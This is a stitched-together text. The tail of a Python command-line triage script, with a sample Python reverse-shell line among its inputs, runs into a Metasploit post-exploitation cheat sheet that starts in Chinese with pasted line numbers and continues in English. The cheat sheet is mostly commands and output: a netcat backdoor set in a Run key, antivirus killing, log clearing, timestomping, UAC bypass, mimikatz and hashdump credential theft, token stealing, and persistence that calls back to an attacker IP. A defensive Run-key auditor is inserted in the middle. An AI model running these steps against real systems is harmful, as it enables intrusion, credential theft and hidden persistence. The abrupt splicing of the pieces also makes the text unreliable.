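    return base64.b64decode(b64).decode("utf-16-le")


def extract_payloads(cmdline):
    """Return every embedded command that could be decoded from the line."""
    text = normalize_cmdline(cmdline)
    found = []
    for m in ENC_RE.finditer(text):
        try:
            found.append(decode_powershell_enc(m.group(1)))
        except (ValueError, UnicodeDecodeError):
            continue  # not valid base64/UTF-16: skip it, keep triaging
    for m in PY_B64_RE.finditer(text):
        try:
            found.append(base64.b64decode(m.group(1)).decode("utf-8", errors="replace"))
        except ValueError:
            continue
    return found


def indicators(text):
    return [name for name, rx in INDICATORS.items() if rx.search(text)]


def triage(cmdline):
    """One record per captured command line: normalized form, decoded
    payloads and the sorted set of indicator families that were hit."""
    norm = normalize_cmdline(cmdline)
    payloads = extract_payloads(cmdline)
    hits = set(indicators(norm))
    for p in payloads:
        hits.update(indicators(p))
    if payloads:
        hits.add("encoded-payload")
    return {"normalized": norm, "payloads": payloads, "indicators": sorted(hits)}


# Constructed sample command lines (not real telemetry). The python body is
# constructed here and base64-encoded at runtime, so no hand-made blob is needed.
CONSTRUCTED_PY = 'import socket,os;s=socket.socket();s.connect(("10.0.0.1",4444));os.dup2(s.fileno(),0)'
SAMPLES = [
    "powershell -ExecutionPolicy Bypass -nop -w hidden -sta -enc ZQBjAGgAbwAgADEA",
    'cer^t^u^til -url""""cache -sp""""lit -f http://192.168.xx.xx:8080/xx.txt',
    "python -c \"exec('%s'.decode('base64'))\"" % base64.b64encode(CONSTRUCTED_PY.encode()).decode(),
    "notepad.exe C:\\Users\\alice\\notes.txt",
]

if __name__ == "__main__":
    for line in SAMPLES:
        print(triage(line))
```

The normalizer is deliberately lossy (it also removes legitimate `""` pairs), which is fine for triage but means the normalized string should not be fed back to a shell; the decoded payloads are what to read, and the indicator families are what to alert on.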
获取到了meterpreter,就可以进行后渗透了。 2033 | 2034 | ### 基本系统命令 2035 | 2036 | ```bash 2037 | # 会话管理 2038 | background #将当前会话放置后台 2039 | sessions # 查看会话 2040 | sessions -i # 切换会话 2041 | quit # 关闭当前的会话,返回msf终端 2042 | 2043 | # 系统设置 2044 | sysinfo # 查看目标机系统信息 2045 | idletime # 查看目标机闲置时间 2046 | reboot/shutdown # 重启/关机 2047 | 2048 | # shell 2049 | shell # 获得控制台权限 2050 | irb # 进入ruby终端 2051 | 2052 | # 进程迁移 2053 | getpid # 获取当前进程的pid 2054 | ps # 查看当前活跃进程 2055 | migrate #将Meterpreter会话移植到指定pid值进程中 2056 | kill #杀死进程 2057 | migrate #将Meterpreter会话移植到指定pid值进程中 2058 | 2059 | # 执行文件 2060 | execute #在目标机中执行文件 2061 | execute -H -i -f cmd.exe # 创建新进程cmd.exe,-H不可见,-i交互 2062 | 2063 | # 摄像头命令 2064 | webcam_list #查看摄像头列表 2065 | webcam_chat # 查看摄像头接口 2066 | webcam_snap #通过摄像头拍照 2067 | webcam_stream #通过摄像头开启视频 2068 | 2069 | # uictl开关键盘/鼠标 2070 | uictl [enable/disable] [keyboard/mouse/all] #开启或禁止键盘/鼠标 2071 | uictl disable mouse #禁用鼠标 2072 | uictl disable keyboard #禁用键盘 2073 | 2074 | # 远程桌面/截屏 2075 | enumdesktops #查看可用的桌面 2076 | getdesktop #获取当前meterpreter 关联的桌面 2077 | screenshot #截屏 2078 | use espia #或者使用espia模块截屏 然后输入screengrab 2079 | run vnc #使用vnc远程桌面连接 2080 | 2081 | # 键盘记录 2082 | keyscan_start #开始键盘记录 2083 | keyscan_dump #导出记录数据 2084 | keyscan_stop #结束键盘记录 2085 | 2086 | # 添加用户,开启远程桌面 2087 | # 开启rdp是通过reg修改注册表;添加用户是调用cmd.exe 通过net user添加;端口转发是利用的portfwd命令 2088 | run post/windows/manage/enable_rdp #开启远程桌面 2089 | run post/windows/manage/enable_rdp USERNAME=www2 PASSWORD=123456 #添加用户 2090 | run post/windows/manage/enable_rdp FORWARD=true LPORT=6662 #将3389端口转发到6662 2091 | 2092 | # 关闭防病毒软件 2093 | run killav 2094 | run post/windows/manage/killav 2095 | 2096 | # 修改注册表 2097 | reg –h # 注册表命令帮助 2098 | upload /usr/share/windows-binaries/nc.exe C:\\windows\\system32 #上传nc 2099 | reg enumkey -k HKLM\\software\\microsoft\\windows\\currentversion\\run #枚举run下的key 2100 | reg setval -k HKLM\\software\\microsoft\\windows\\currentversion\\run -v lltest_nc -d 'C:\windows\system32\nc.exe -Ldp 443 -e cmd.exe' #设置键值 
2101 | reg queryval -k HKLM\\software\\microsoft\\windows\\currentversion\\Run -v lltest_nc #查看键值 2102 | nc -v 192.168.81.162 443 #攻击者连接nc后门 2103 | 2104 | # 清理日志 2105 | clearav #清除windows中的应用程序日志、系统日志、安全日志 2106 | ``` 2107 | 2108 | ### 文件系统命令 2109 | 2110 | ```bash 2111 | cat/ls/cd/rm # 基本命令 2112 | search -f *pass* -d C:\\windows # 搜索文件 -h查看帮助 2113 | getwd/pwd # 获取当前目录 2114 | getlwd/lpwd # 操作攻击者主机 查看当前目录 2115 | upload /tmp/hack.txt C:\\lltest # 上传文件 2116 | download c:\\lltest\\lltestpasswd.txt /tmp/ # 下载文件 2117 | edit c:\\1.txt # 编辑或创建文件 没有的话,会新建文件 2118 | mkdir lltest2 # 只能在当前目录下创建文件夹 2119 | rmdir lltest2 # 只能删除当前目录下文件夹 2120 | lcd /tmp # 操作攻击者主机 切换目录 2121 | 2122 | # timestomp伪造文件时间戳 2123 | timestomp C:// -h #查看帮助 2124 | timestomp -v C://2.txt #查看时间戳 2125 | timestomp C://2.txt -f C://1.txt #将1.txt的时间戳复制给2.txt 2126 | ``` 2127 | 2128 | ### 网络命令 2129 | 2130 | ```bash 2131 | # 基本 2132 | ipconfig/ifconfig 2133 | netstat –ano 2134 | arp 2135 | getproxy #查看代理信息 2136 | route #查看路由 2137 | 2138 | # portfwd端口转发 2139 | portfwd add -l 6666 -p 3389 -r 127.0.0.1 # 将目标机的3389端口转发到本地6666端口 2140 | rdesktop -u Administrator -p ichunqiu 127.0.0.1:4444 #然后使用rdesktop来连接,-u 用户名 -p 密码 2141 | 2142 | 2143 | # 添加路由 2144 | 2145 | # 方式一autoroute (deprecated) 2146 | run autoroute –h #查看帮助 2147 | run autoroute -s 192.168.2.0/24 #添加到目标环境网络 2148 | run autoroute –p #查看添加的路由 2149 | 2150 | # 方式二post/multi/manage/autoroute 2151 | run post/multi/manage/autoroute CMD=autoadd #自动添加到目标环境网络 2152 | run post/multi/manage/autoroute CMD=print # 查看添加的路由 2153 | (Specify the autoroute command (Accepted: add, autoadd, print, delete, default)) 2154 | 2155 | # 然后可以利用arp_scanner、portscan等进行存活检测 2156 | run arp_scanner -r 192.168.2.0/24 2157 | run post/multi/gather/ping_sweep RHOSTS=192.168.2.0/24 2158 | run auxiliary/scanner/portscan/tcp RHOSTS=192.168.2.0 2159 | 2160 | # autoroute添加完路由后,还可以利用msf自带的模块进行socks代理 2161 | # msf提供了2个模块用来做socks代理。 2162 | # auxiliary/server/socks_proxy 2163 | # use auxiliary/server/socks_unc 2164 
| # 先background退出来,然后: 2165 | use auxiliary/server/socks_proxy 2166 | set srvhost 127.0.0.1 2167 | set srvport 1080 2168 | run 2169 | 2170 | # 然后vi /etc/proxychains.conf #添加 socks5 127.0.0.1 1080 2171 | # 最后proxychains 使用Socks5代理访问 2172 | 2173 | # sniffer抓包 2174 | use sniffer 2175 | sniffer_interfaces #查看网卡 2176 | sniffer_start 2 #选择网卡 开始抓包 2177 | sniffer_stats 2 #查看状态 2178 | sniffer_dump 2 /tmp/lltest.pcap #导出pcap数据包 2179 | sniffer_stop 2 #停止抓包 2180 | ``` 2181 | 2182 | ### 信息收集 2183 | 2184 | ```bash 2185 | # 信息收集的脚本位于: 2186 | # modules/post/windows/gather 2187 | # modules/post/linux/gather 2188 | # 以下列举一些常用的 2189 | run post/windows/gather/checkvm #是否虚拟机 2190 | run post/linux/gather/checkvm #是否虚拟机 2191 | run post/windows/gather/forensics/enum_drives #查看分区 2192 | run post/windows/gather/enum_applications #获取安装软件信息 2193 | run post/windows/gather/dumplinks #获取最近的文件操作 2194 | run post/windows/gather/enum_ie #获取IE缓存 2195 | run post/windows/gather/enum_chrome #获取Chrome缓存 2196 | run post/windows/gather/enum_patches #补丁信息 2197 | run post/windows/gather/enum_domain #查找定位域控 2198 | run post/windows/gather/enum_logged_on_users #登录过的用户 2199 | ``` 2200 | 2201 | ### 提权 2202 | 2203 | 1.getsystem提权 2204 | getsystem工作原理: 2205 | ①getsystem创建一个新的Windows服务,设置为SYSTEM运行,当它启动时连接到一个命名管道。 2206 | ②getsystem产生一个进程,它创建一个命名管道并等待来自该服务的连接。 2207 | ③Windows服务已启动,导致与命名管道建立连接。 2208 | ④该进程接收连接并调用ImpersonateNamedPipeClient,从而为SYSTEM用户创建模拟令牌。 2209 | 然后用新收集的SYSTEM模拟令牌产生cmd.exe,并且我们有一个SYSTEM特权进程。 2210 | 2211 | ```bash 2212 | getsystem 2213 | ``` 2214 | 2215 | 2.bypassuac 2216 | 用户帐户控制(UAC)是微软在 Windows Vista 以后版本引入的一种安全机制,有助于防止对系统进行未经授权的更改。应用程序和任务可始终在非管理员帐户的安全上下文中运行,除非管理员专门给系统授予管理员级别的访问权限。UAC 可以阻止未经授权的应用程序进行自动安装,并防止无意中更改系统设置。 2217 | 2218 | msf提供了如下几个模块帮助绕过UAC: 2219 | 2220 | ```bash 2221 | msf5 auxiliary(server/socks5) > search bypassuac 2222 | 2223 | Matching Modules 2224 | ================ 2225 | 2226 | # Name Disclosure Date Rank Check Description 2227 | - ---- --------------- ---- ----- ----------- 2228 
| 0 exploit/windows/local/bypassuac 2010-12-31 excellent No Windows Escalate UAC Protection Bypass 2229 | 1 exploit/windows/local/bypassuac_comhijack 1900-01-01 excellent Yes Windows Escalate UAC Protection Bypass (Via COM Handler Hijack) 2230 | 2 exploit/windows/local/bypassuac_eventvwr 2016-08-15 excellent Yes Windows Escalate UAC Protection Bypass (Via Eventvwr Registry Key) 2231 | 3 exploit/windows/local/bypassuac_fodhelper 2017-05-12 excellent Yes Windows UAC Protection Bypass (Via FodHelper Registry Key) 2232 | 4 exploit/windows/local/bypassuac_injection 2010-12-31 excellent No Windows Escalate UAC Protection Bypass (In Memory Injection) 2233 | 5 exploit/windows/local/bypassuac_injection_winsxs 2017-04-06 excellent No Windows Escalate UAC Protection Bypass (In Memory Injection) abusing WinSXS 2234 | 6 exploit/windows/local/bypassuac_sluihijack 2018-01-15 excellent Yes Windows UAC Protection Bypass (Via Slui File Handler Hijack) 2235 | 7 exploit/windows/local/bypassuac_vbs 2015-08-22 excellent No Windows Escalate UAC Protection Bypass (ScriptHost Vulnerability) 2236 | ``` 2237 | 2238 | 使用方法类似,运行后返回一个新的会话,**需要再次执行getsystem获取系统权限** 2239 | 2240 | ```bash 2241 | # 示例 2242 | meterpreter > getuid 2243 | Server username: SAUCERMAN\TideSec 2244 | meterpreter > background 2245 | [*] Backgrounding session 4... 2246 | msf5 exploit(multi/handler) > use exploit/windows/local/bypassuac 2247 | msf5 exploit(windows/local/bypassuac) > set SESSION 4 2248 | SESSION => 4 2249 | msf5 exploit(windows/local/bypassuac) > run 2250 | 2251 | [-] Handler failed to bind to 192.168.81.160:4444:- - 2252 | [-] Handler failed to bind to 0.0.0.0:4444:- - 2253 | [*] UAC is Enabled, checking level... 2254 | [+] UAC is set to Default 2255 | [+] BypassUAC can bypass this setting, continuing... 2256 | [+] Part of Administrators group! Continuing... 2257 | [*] Uploaded the agent to the filesystem.... 2258 | [*] Uploading the bypass UAC executable to the filesystem... 
2259 | [*] Meterpreter stager executable 73802 bytes long being uploaded.. 2260 | [*] Sending stage (206403 bytes) to 192.168.81.154 2261 | [*] Meterpreter session 5 opened (192.168.81.160:4444 -> 192.168.81.154:1134) at 2019-06-12 06:31:11 -0700 2262 | [-] Exploit failed [timeout-expired]: Timeout::Error execution expired 2263 | [*] Exploit completed, but no session was created. 2264 | 2265 | # 然后返回新的meterpreter会话,继续执行getsystem本应该会提权成功 2266 | # 然鹅这里失败了 2267 | ``` 2268 | 2269 | 3.内核漏洞提权 2270 | 2271 | 无论是linux还是windows都出过很多高危的漏洞,我们可以利用它们进行权限提升,比如windows系统的ms13-081、ms15-051、ms16-032、ms17-010等,msf也集成了这些漏洞的利用模块。 2272 | 2273 | ```bash 2274 | meterpreter > run post/windows/gather/enum_patches #查看补丁信息 2275 | msf5 > use exploit/windows/local/ms13_053_schlamperei 2276 | msf5 > set SESSION 2 2277 | msf5 > exploit 2278 | 2279 | # 示例 2280 | meterpreter > run post/windows/gather/enum_patches 2281 | 2282 | [+] KB2871997 is missing 2283 | [+] KB2928120 is missing 2284 | [+] KB977165 - Possibly vulnerable to MS10-015 kitrap0d if Windows 2K SP4 - Windows 7 (x86) 2285 | [+] KB2305420 - Possibly vulnerable to MS10-092 schelevator if Vista, 7, and 2008 2286 | [+] KB2592799 - Possibly vulnerable to MS11-080 afdjoinleaf if XP SP2/SP3 Win 2k3 SP2 2287 | [+] KB2778930 - Possibly vulnerable to MS13-005 hwnd_broadcast, elevates from Low to Medium integrity 2288 | [+] KB2850851 - Possibly vulnerable to MS13-053 schlamperei if x86 Win7 SP0/SP1 2289 | [+] KB2870008 - Possibly vulnerable to MS13-081 track_popup_menu if x86 Windows 7 SP0/SP1 2290 | meterpreter > background 2291 | [*] Backgrounding session 4... 
msf5 exploit(windows/local/bypassuac) > search MS13-081

Matching Modules
================

   #  Name                                             Disclosure Date  Rank     Check  Description
   -  ----                                             ---------------  ----     -----  -----------
   0  exploit/windows/local/ms13_081_track_popup_menu  2013-10-08       average  Yes    Windows TrackPopupMenuEx Win32k NULL Page


msf5 exploit(windows/local/bypassuac) > use exploit/windows/local/ms13_081_track_popup_menu
msf5 exploit(windows/local/ms13_081_track_popup_menu) > set session 4
session => 4
msf5 exploit(windows/local/ms13_081_track_popup_menu) > exploit

[!] SESSION may not be compatible with this module.
[-] Handler failed to bind to 192.168.81.160:4444:-  -
[-] Handler failed to bind to 0.0.0.0:4444:-  -
[-] Exploit aborted due to failure: no-target: Running against 64-bit systems is not supported
[*] Exploit completed, but no session was created.
# failed again: the session is on 64-bit Windows and this module only supports x86
```

### Harvesting credentials

In an internal network one administrator usually manages many servers, and the passwords are likely to be identical or to follow a pattern. Once you have a password or a hash, trying it against the other hosts (the NT hash works directly for pass-the-hash) can pay off far beyond the box you are on.

1. mimikatz

```bash
load mimikatz                                  # help mimikatz shows the commands
wdigest                                        # dump WDigest (plaintext) credentials
mimikatz_command -f samdump::hashes            # run a raw mimikatz command
mimikatz_command -f sekurlsa::searchPasswords

# example
meterpreter > load mimikatz
Loading extension mimikatz...[!] Loaded Mimikatz on a newer OS (Windows 7 (Build 7601, Service Pack 1).). Did you mean to 'load kiwi' instead?
Success.
meterpreter > wdigest
[!] Not currently running as SYSTEM
[*] Attempting to getprivs ...
[+] Got SeDebugPrivilege.
[*] Retrieving wdigest credentials
wdigest credentials
===================

AuthID    Package    Domain        User           Password
------    -------    ------        ----           --------
0;997     Negotiate  NT AUTHORITY  LOCAL SERVICE
0;996     Negotiate  WORKGROUP     SAUCERMAN$
0;48748   NTLM
0;999     NTLM       WORKGROUP     SAUCERMAN$
0;476238  NTLM       SAUCERMAN     TideSec        123456
0;476209  NTLM       SAUCERMAN     TideSec        123456

meterpreter > mimikatz_command -f samdump::hashes
Ordinateur : saucerman
BootKey    : 691cff33caf49e933be97fcee370256a
RegOpenKeyEx SAM : (0x00000005)
Erreur lors de l'exploration du registre
meterpreter > mimikatz_command -f sekurlsa::searchPasswords
[0] { TideSec ; SAUCERMAN ; 123456 }
[1] { TideSec ; SAUCERMAN ; 123456 }
[2] { SAUCERMAN ; TideSec ; 123456 }
[3] { SAUCERMAN ; TideSec ; 123456 }
[4] { TideSec ; SAUCERMAN ; 123456 }
[5] { TideSec ; SAUCERMAN ; 123456 }
```

`wdigest` and `sekurlsa::searchPasswords` only needed SeDebugPrivilege and already returned the plaintext password. `samdump::hashes` failed with 0x00000005 (access denied): the session was not SYSTEM at this point ("Not currently running as SYSTEM" above), and reading the SAM hive requires that. The extension also warns that on this OS version `load kiwi` is the maintained replacement for `load mimikatz`.

2. meterpreter's `run hashdump`

```bash
meterpreter > run hashdump

[!] Meterpreter scripts are deprecated. Try post/windows/gather/smart_hashdump.
[!] Example: run post/windows/gather/smart_hashdump OPTION=value [...]
[*] Obtaining the boot key...
[*] Calculating the hboot key using SYSKEY 691cff33caf49e933be97fcee370256a...
/opt/metasploit-framework/embedded/framework/lib/rex/script/base.rb:134: warning: constant OpenSSL::Cipher::Cipher is deprecated
[*] Obtaining the user list and keys...
[*] Decrypting user keys...
/opt/metasploit-framework/embedded/framework/lib/rex/script/base.rb:268: warning: constant OpenSSL::Cipher::Cipher is deprecated
/opt/metasploit-framework/embedded/framework/lib/rex/script/base.rb:272: warning: constant OpenSSL::Cipher::Cipher is deprecated
/opt/metasploit-framework/embedded/framework/lib/rex/script/base.rb:279: warning: constant OpenSSL::Cipher::Cipher is deprecated
[*] Dumping password hints...

TideSec:"123456"

[*] Dumping password hashes...


Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
TideSec:1000:aad3b435b51404eeaad3b435b51404ee:32ed87bdb5fdc5e9cba88547376818d4:::
```

3. post/windows/gather/smart_hashdump

As the warning above says, `post/windows/gather/smart_hashdump` is the officially recommended replacement. It also stores the hashes in the msf database when one is connected and writes them to loot in John the Ripper format (and the output below shows this run was already SYSTEM).

```bash
meterpreter > run post/windows/gather/smart_hashdump

[*] Running module against SAUCERMAN
[*] Hashes will be saved to the database if one is connected.
[+] Hashes will be saved in loot in JtR password file format to:
[*] /home/ubuntu/.msf4/loot/20190612084715_default_192.168.81.154_windows.hashes_439550.txt
[*] Dumping password hashes...
[*] Running as SYSTEM extracting hashes from registry
[*] Obtaining the boot key...
[*] Calculating the hboot key using SYSKEY 691cff33caf49e933be97fcee370256a...
[*] Obtaining the user list and keys...
[*] Decrypting user keys...
[*] Dumping password hints...
[+] TideSec:"123456"
[*] Dumping password hashes...
[+] Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[+] TideSec:1000:aad3b435b51404eeaad3b435b51404ee:32ed87bdb5fdc5e9cba88547376818d4:::
```

The format is `user:RID:LM hash:NT hash:::`. `aad3b435b51404eeaad3b435b51404ee` in the LM field means no LM hash is stored, and `31d6cfe0d16ae931b73c59d7e0c089c0` is the NT hash of an empty password, so Administrator and Guest here have blank passwords (both accounts are disabled by default on Windows 7, so check that before relying on it). TideSec's NT hash is the one to reuse for pass-the-hash; it is the hash of the `123456` that wdigest already revealed.

4. powerdump

Same purpose as hashdump, but it failed here: the script uploads a PowerShell file to %TEMP% and runs it, and opening that file failed with "The system cannot find the file specified".

```bash
meterpreter > run powerdump
[*] PowerDump v0.1 - PowerDump to extract Username and Password Hashes...
[*] Running PowerDump to extract Username and Password Hashes...
[*] Uploaded PowerDump as 69921.ps1 to %TEMP%...
[*] Setting ExecutionPolicy to Unrestricted...
[*] Dumping the SAM database through PowerShell...

[-] Could not execute powerdump: Rex::Post::Meterpreter::RequestError core_channel_open: Operation failed: The system cannot find the file specified.
```

### Token impersonation

When a user logs on to Windows, the system assigns the logon an access token, and every access to a resource is checked against that token, much like a session ID or cookie on a website.

msf's incognito extension lets you impersonate someone else's token and switch identity. In a domain, if a domain admin has logged on to a host you already control and their token is still present, you can impersonate it and act as the domain admin.

```bash
# 1. incognito
use incognito                              # help incognito shows the commands
list_tokens -u                             # list the available tokens by user
impersonate_token 'NT AUTHORITY\SYSTEM'    # impersonate the SYSTEM token
impersonate_token NT\ AUTHORITY\\SYSTEM    # same without quotes: escape the space and use \\
execute -f cmd.exe -i -t                   # -t runs the program with the impersonated token
shell                                      # or just drop into a shell
rev2self                                   # revert to the original token

# 2. steal_token
steal_token <pid>    # steal a process's token; run ps first and pick one running as the domain admin
drop_token           # drop the stolen token
```

### Planting a backdoor

Meterpreter lives only in memory, so a reboot of the target loses the session. The following modules plant a backdoor so that control survives a reboot.

1. persistence (startup-item backdoor)

Path: metasploit/scripts/meterpreter/persistence

It uploads a VBS script to `C:\Users\***\AppData\Local\Temp\` and registers it as a startup item under `HKLM\Software\Microsoft\Windows\CurrentVersion\Run\`. **Both artifacts are easily caught by AV, and the script is deprecated upstream.**

```bash
run persistence -h                                   # help
run persistence -X -i 5 -p 4444 -r 192.168.81.160
# -X install as a system startup item (runs at boot, HKLM Run key), -i callback interval in seconds (5),
# -p callback port, -r attacker IP
```
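As an added example (not from the original cheat sheet or from Metasploit): a small Python check for the artifacts just described, run offline over the text of a `reg export` of the Run keys. It flags a Run value that launches something from a user's Temp folder, runs a .vbs through the Windows Script Host, or starts a hidden PowerShell loader that reads its code from the registry, which also covers the HKCU Run and registry-blob variants shown further down the page. The registry text inside it is constructed for the example: the value names are the ones printed by the modules on this page, but the command strings are assumptions about what such entries look like, not the modules' exact strings.

```python
r"""Flag suspicious Run-key entries in a .reg export.

Added example for this cheat sheet, not Metasploit code. On the host run
    reg export "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" hklm_run.reg
(and the HKCU equivalent), then point this script at the file. With no
argument it audits the constructed SAMPLE_REG text below.
"""
import re
import sys

HIVES = {"HKEY_LOCAL_MACHINE": "HKLM", "HKEY_CURRENT_USER": "HKCU"}
RUN_KEY = re.compile(r"\\CurrentVersion\\Run(Once)?$", re.IGNORECASE)

# (reason, pattern tested against the unescaped command string of each Run value)
RULES = [
    ("launches from a user Temp directory",
     re.compile(r"\\AppData\\Local\\Temp\\|%TEMP%|%TMP%", re.IGNORECASE)),
    ("runs a script through the Windows Script Host",
     re.compile(r"\.vbs\b|\.js\b|\b[wc]script(\.exe)?\b", re.IGNORECASE)),
    ("hidden PowerShell loader pulling its code from the registry",
     re.compile(r"powershell.*(-w(indowstyle)?\s+hidden|-nop\b|-enc|FromBase64String|Get-ItemProperty)",
                re.IGNORECASE)),
]


def _unescape(s):
    """.reg strings escape backslash and double quote with a backslash."""
    return re.sub(r"\\(.)", r"\1", s)


def parse_reg(text):
    """Return {key_path: {value_name: data}} for the REG_SZ values of a .reg export."""
    keys, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        m = re.match(r"^\[(.+)\]$", line)
        if m:
            current = m.group(1)
            keys[current] = {}
            continue
        m = re.match(r'^"((?:[^"\\]|\\.)*)"="((?:[^"\\]|\\.)*)"$', line)
        if m and current is not None:
            keys[current][_unescape(m.group(1))] = _unescape(m.group(2))
    return keys


def audit_run_keys(keys):
    """Apply RULES to every value under a Run/RunOnce key; return the hits."""
    findings = []
    for path, values in keys.items():
        if not RUN_KEY.search(path):
            continue
        hive, _, subkey = path.partition("\\")
        for name, command in values.items():
            reasons = [reason for reason, rx in RULES if rx.search(command)]
            if reasons:
                findings.append({"hive": HIVES.get(hive, hive), "key": subkey,
                                 "name": name, "command": command, "reasons": reasons})
    return findings


# Constructed sample. Value names are the ones printed by the modules on this page;
# the command strings are assumptions about what such entries look like, not exact module output.
SAMPLE_REG = r"""Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run]
"VMware User Process"="\"C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe\" -n vmusr"
"qrsXZuPqVbEgua"="wscript.exe //B \"C:\\Users\\TideSec\\AppData\\Local\\Temp\\qexwcMF.vbs\""

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
"mEMZDQOxkkeebI"="C:\\Users\\TideSec\\AppData\\Local\\Temp\\backdoor.exe"
"SMPqA5kB"="powershell.exe -nop -w hidden -c \"IEX ([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String((Get-ItemProperty HKCU:\\Software\\0BaG3zDR).iiEB4InD)))\""
"""

if __name__ == "__main__":
    # reg export writes UTF-16 with a BOM; the "utf-16" codec handles that.
    text = open(sys.argv[1], encoding="utf-16").read() if len(sys.argv) > 1 else SAMPLE_REG
    for f in audit_run_keys(parse_reg(text)):
        print(f"{f['hive']}\\{f['key']}\\{f['name']}\n    {f['command']}\n    -> {'; '.join(f['reasons'])}")
```

Running it on the sample reports the three planted entries and leaves the VMware one alone. The same rules are what you would put into a scheduled audit of the Run keys on a fleet; the hidden-PowerShell rule is deliberately broad because the loader string varies between module versions.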
Example:

```bash
meterpreter > run persistence -X -i 5 -p 4444 -r 192.168.81.160

[!] Meterpreter scripts are deprecated. Try post/windows/manage/persistence_exe.
[!] Example: run post/windows/manage/persistence_exe OPTION=value [...]
[*] Running Persistence Script
[*] Resource file for cleanup created at /home/ubuntu/.msf4/logs/persistence/SAUCERMAN_20190612.4235/SAUCERMAN_20190612.4235.rc
[*] Creating Payload=windows/meterpreter/reverse_tcp LHOST=192.168.81.160 LPORT=4444
[*] Persistent agent script is 99630 bytes long
[+] Persistent Script written to C:\Users\TideSec\AppData\Local\Temp\qexwcMF.vbs
[*] Executing script C:\Users\TideSec\AppData\Local\Temp\qexwcMF.vbs
[+] Agent executed with PID 3540
[*] Installing into autorun as HKLM\Software\Microsoft\Windows\CurrentVersion\Run\qrsXZuPqVbEgua
[+] Installed into autorun as HKLM\Software\Microsoft\Windows\CurrentVersion\Run\qrsXZuPqVbEgua
```

The module `exploit/windows/local/persistence` does the same job. Keep the cleanup resource file printed at the start of the run: it is what removes the autorun entry and the script again.

2. metsvc service backdoor

metsvc uploads three files (metsrv.dll, metsvc-server.exe and metsvc.exe) to a temporary directory under `C:\Users\***\AppData\Local\Temp\` and registers metsvc.exe as a Windows service that listens on port 31337 (a bind Meterpreter, not a reverse one). **Creating a service needs administrator rights, the script is deprecated upstream, and the run below failed.**

```bash
run metsvc -A            # install the service and start a handler that connects to it
run metsvc -r            # remove the service

# example
meterpreter > run metsvc -A

[!] Meterpreter scripts are deprecated. Try post/windows/manage/persistence_exe.
[!] Example: run post/windows/manage/persistence_exe OPTION=value [...]
[*] Creating a meterpreter service on port 31337
[*] Creating a temporary installation directory C:\Users\TideSec\AppData\Local\Temp\iInvhjKZbLH...
[*]  >> Uploading metsrv.x86.dll...
[*]  >> Uploading metsvc-server.exe...
[*]  >> Uploading metsvc.exe...
[*] Starting the service...
Cannot open service manager (0x00000005)

meterpreter > ls
Listing: C:\Users\TideSec\AppData\Local\Temp\iInvhjKZbLH
========================================================

Mode              Size    Type  Last modified              Name
----              ----    ----  -------------              ----
100666/rw-rw-rw-  178688  fil   2019-06-12 06:46:20 -0700  metsrv.dll
100777/rwxrwxrwx  45056   fil   2019-06-12 06:46:21 -0700  metsvc-server.exe
100777/rwxrwxrwx  61440   fil   2019-06-12 06:46:21 -0700  metsvc.exe
```

All three files were uploaded, but the service was not started: 0x00000005 is ERROR_ACCESS_DENIED, i.e. the session is not running as an administrator. `run metsvc -r` removes the service.

3. persistence_exe

Now the module the deprecation warnings point to:

```bash
meterpreter > info post/windows/manage/persistence_exe

       Name: Windows Manage Persistent EXE Payload Installer
     Module: post/windows/manage/persistence_exe
   Platform: Windows
       Arch:
       Rank: Normal

Provided by:
  Merlyn drforbin Cousins

Compatible session types:
  Meterpreter

Basic options:
  Name      Current Setting  Required  Description
  ----      ---------------  --------  -----------
  REXENAME  default.exe      yes       The name to call exe on remote system
  REXEPATH                   yes       The remote executable to upload and execute.
  SESSION                    yes       The session to run this module on.
  STARTUP   USER             yes       Startup type for the persistent payload. (Accepted: USER, SYSTEM, SERVICE)

Description:
  This Module will upload an executable to a remote host and make it
  Persistent. It can be installed as USER, SYSTEM, or SERVICE. USER
  will start on user login, SYSTEM will start on system boot but
  requires privs. SERVICE will create a new service which will start
  the payload. Again requires privs.


Module options (post/windows/manage/persistence_exe):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   REXENAME  default.exe      yes       The name to call exe on remote system
   REXEPATH                   yes       The remote executable to upload and execute.
   SESSION                    yes       The session to run this module on.
   STARTUP   USER             yes       Startup type for the persistent payload. (Accepted: USER, SYSTEM, SERVICE)
```

This module uploads an executable to the remote host and makes it persistent. Four options matter:

- REXENAME is the file name the executable gets on the target
- REXEPATH is the local path of the backdoor to upload
- SESSION is the session to run the module on
- STARTUP is the startup type: USER, SYSTEM or SERVICE. USER starts it at user logon (an HKCU Run key, no privileges needed), SYSTEM starts it at system boot (needs privileges), SERVICE creates a new service that starts it (also needs privileges).

Trying it:

```bash
meterpreter > run post/windows/manage/persistence_exe REXENAME=backdoor.exe REXEPATH=/home/ubuntu/shell.exe STARTUP=USER

[*] Running module against SAUCERMAN
[*] Reading Payload from file /home/ubuntu/shell.exe
[+] Persistent Script written to C:\Users\TideSec\AppData\Local\Temp\backdoor.exe
[*] Executing script C:\Users\TideSec\AppData\Local\Temp\backdoor.exe
[+] Agent executed with PID 3684
[*] Installing into autorun as HKCU\Software\Microsoft\Windows\CurrentVersion\Run\mEMZDQOxkkeebI
[+] Installed into autorun as HKCU\Software\Microsoft\Windows\CurrentVersion\Run\mEMZDQOxkkeebI
[*] Cleanup Meterpreter RC File: /home/ubuntu/.msf4/logs/persistence/SAUCERMAN_20190612.1023/SAUCERMAN_20190612.1023.rc
```

4. registry_persistence

Full path: exploit/windows/local/registry_persistence

Similar to the first method, but instead of dropping a file it stores the payload as a blob in a registry key and installs a Run key that loads it. With the default STARTUP=USER both keys live under HKCU, so no elevated privileges are needed.

```bash
meterpreter > background
[*] Backgrounding session 13...
msf5 auxiliary(server/socks5) > use exploit/windows/local/registry_persistence
msf5 exploit(windows/local/registry_persistence) > show options

Module options (exploit/windows/local/registry_persistence):

   Name           Current Setting  Required  Description
